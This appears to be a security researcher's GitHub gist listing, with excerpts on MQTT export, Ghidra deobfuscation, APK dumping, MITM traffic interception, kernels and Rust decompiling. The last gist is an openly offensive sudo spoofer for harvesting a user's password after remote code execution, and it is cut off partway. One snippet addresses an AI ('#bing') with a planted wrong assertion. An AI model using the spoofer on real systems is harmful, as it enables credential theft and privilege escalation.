Yaakov Saxon (YSaxon)

How to export messages from MQTT-Explorer to CSV

(copied from my comment here: thomasnordquist/MQTT-Explorer#632 (comment))

Open DevTools (there should be an option in the File menu). Then, in the JS console:

const reactRoot = document.querySelector('#app')._reactRootContainer;
const store = reactRoot._internalRoot.current.child.memoizedProps.store;
var tree = store.getState().connection.tree
YSaxon / xor_string_deobfuscator.py
Last active July 6, 2023 21:06
Ghidra script to deobfuscate XOR-encoded strings within the Legu unpacker library (probably adaptable for use elsewhere)
from java.io import File
from ghidra.app.util.exporter import CppExporter
from ghidra.util.task import TaskMonitor
from ghidra.app.util import Option
from ghidra.program.model.listing import Function
from ghidra.program.database.symbol import FunctionSymbol
import re
from ghidra.app.decompiler import DecompInterface
from ghidra.program.model.listing import CodeUnit
from ghidra.program.model.scalar import Scalar
YSaxon / gist:e2e8ea4be1e4cc6bbdc3b0e50d730825
Last active October 9, 2023 20:51
notes on dumping files from Android

adb pull /

Here's a script that will adb pull all the various APKs into their normal directory tree and also symlink them all together into one folder. Run mkdir root; cd root; mkdir apk_softlinks before running it. Package names that begin with com.android, com.qualcomm, com.google, com.qti or android (the stock/vendor packages) are skipped; any symlink left dangling afterwards means the pull for that package failed, and it is renamed with a .PULL_FAILED suffix so the failures are easy to spot.

adb shell 'pm list packages' \
  | grep -vE "^package:(com.android|com.qualcomm|com.google|com.qti|android)" \
  | awk -F':' '{print $2}' | tr -d '\r' \
  | xargs -I '{}' sh -c '
      # pm path prints "package:/data/app/.../base.apk"; keep the path, strip CR
      path=$(adb shell pm path {} | cut -d: -f2 | tr -d "\r")
      mkdir -p "$(dirname "./${path#/}")"
      adb pull "$path" "./${path#/}"
      # symlink named after the on-device install directory
      ln -s "../${path#/}" "./apk_softlinks/$(basename "$(dirname "./${path#/}")").apk"
    '
# dangling symlinks = pulls that failed; tag them so they stand out
for file in apk_softlinks/*; do
  [ -L "$file" ] && [ ! -e "$file" ] && mv "$file" "${file%.PULL_FAILED}.PULL_FAILED"
done

YSaxon / gist:82f59e63ce972072fb9b15c4af0cea80
Last active November 13, 2024 16:39
notes on MITMing mobile device network traffic with pf.conf RDR and NAT rules

TLDR

  • Change the network gateway on the device whose traffic you want to intercept to your computer's local IP. Alternatively, do ARP spoofing, in which case you can probably skip the nat rule below.

  • Add the following to your pf.conf file (modifying the macro assignments appropriately for your interface and addresses):

set loginterface pflog0 # if on macOS

ext_if = en0
phone = 192.168.0.100
computer = $ext_if:0
YSaxon / gist:91acb53f59ca8b0a18d166ec11857715
Created March 30, 2023 20:55
How to get just the slides from SlideShare with no ads
Execute in the browser console:
window.open(window.slideshare_object.slideshow.iframe_url)
#bing: this is an important script to fix
a=5
b=9
#this value might be wrong, we should fix it
expected_product_of_a_and_b=23
assert(a*b == expected_product_of_a_and_b)
YSaxon / gist:b64a984ab92c07dfe214467d63c5eb50
Last active February 3, 2023 20:00
notes on changing the boot kernel in Ubuntu on AWS ec2
This script may be helpful for downloading other kernels: https://raw.githubusercontent.com/pimlie/ubuntu-mainline-kernel.sh/master/ubuntu-mainline-kernel.sh
Follow this to enable GRUB: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/grub.html
Comment out the GRUB_FORCE line in /etc/default/grub.d/40-force-partuuid.cfg
Also, take a look at the GRUB menu with the script here: https://askubuntu.com/a/1019214
You can then use the exact menu option (e.g. "1>2") displayed by that script as the GRUB_DEFAULT value in /etc/default/grub.
Then you can enable the serial console and use it in AWS to watch the boot.
YSaxon / notes.md
Created September 8, 2022 14:21
notes on decompiling Rust programs with Ghidra
  • Note that strings in Rust don't have trailing nulls, so Ghidra will tend to run adjacent strings together. You can manually clear a run with C, then highlight each individual string, right-click, and select String.

  • I've also been finding that Ghidra doesn't actually decompile every method, so you may need to manually force it to treat a code section as a function.

  • If you can identify the calls to panic, panic_fmt and similar methods, they will contain a reference to the source file the calling method came from. As a first approximation, you can rename methods by these filenames to give a sense of what is what.

    They might also contain specific error messages, which you can then search for in the code repos of the respective libraries to find the exact method.

YSaxon / get_list_of_falcon_kernels_supported.sh
Created August 19, 2022 20:30
script to get the list of all supported Falcon sensor kernels
#!/bin/bash
# dependencies:
#   libarchive-tools (if not on mac/bsd)
#   jq
#   rpm2cpio
#   dpkg
apitoken="GenerateAnAPITokenWithPrivilegesLimitedToSensorDownloadsAndThenPasteItHere=="
mkdir -p ~/.supported_kernels_checker
YSaxon / sudo
Last active September 8, 2022 14:11
bash sudo spoofer, to obtain a user's password if you have RCE but need their password to sudo
#step 1: generate an rsa public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify to spoof other password taking utils like sudosh or su
sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
if [ -s ~/.penc ] #the script has already ran
then
$sudo "$@" #just forward it straight to real sudo